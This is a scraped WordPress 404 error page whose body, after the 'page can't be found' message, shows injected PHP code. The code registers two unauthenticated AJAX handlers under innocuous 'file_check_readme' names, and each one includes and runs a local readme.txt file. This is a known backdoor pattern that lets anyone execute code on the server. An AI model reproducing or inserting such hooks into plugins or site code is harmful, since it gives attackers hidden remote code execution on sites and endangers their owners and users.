404
Oops! That page can’t be found.
if(!function_exists('file_check_readme96277')){ add_action('wp_ajax_nopriv_file_check_readme96277', 'file_check_readme96277'); add_action('wp_ajax_file_check_readme96277', 'file_check_readme96277'); function file_check_readme96277() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme16024')){ add_action('wp_ajax_nopriv_file_check_readme16024', 'file_check_readme16024'); add_action('wp_ajax_file_check_readme16024', 'file_check_readme16024'); function file_check_readme16024() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }